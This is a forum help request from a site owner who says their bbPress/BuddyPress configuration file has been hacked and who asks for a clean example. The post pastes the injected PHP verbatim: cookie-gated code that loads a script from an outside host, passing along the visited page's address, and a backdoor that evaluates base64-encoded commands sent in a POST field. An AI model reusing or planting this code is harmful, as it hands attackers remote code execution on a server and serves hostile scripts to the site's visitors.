Hacked. Need new bbconfig ( buddypress version)

I need a new bbconfig ( buddypress version) example. Mine looks hacked.

<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = “lb11”; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = “102”; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } } else { if($_COOKIE[$sessdt_k]==”102″:wink: { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } $sessdt_j = @$_SERVER[“HTTP_HOST”].@$_SERVER[“REQUEST_URI”]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($sessdt_v,-200); echo “<script src=’$sessdt_u’></script>”; echo “<meta http-equiv=’refresh’ content=’0;url=http://$sessdt_j’><!–“; } } $sessdt_p = “showimg”; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

/**

* The base configurations of bbPress.

http://turnitupnow.net is not my site.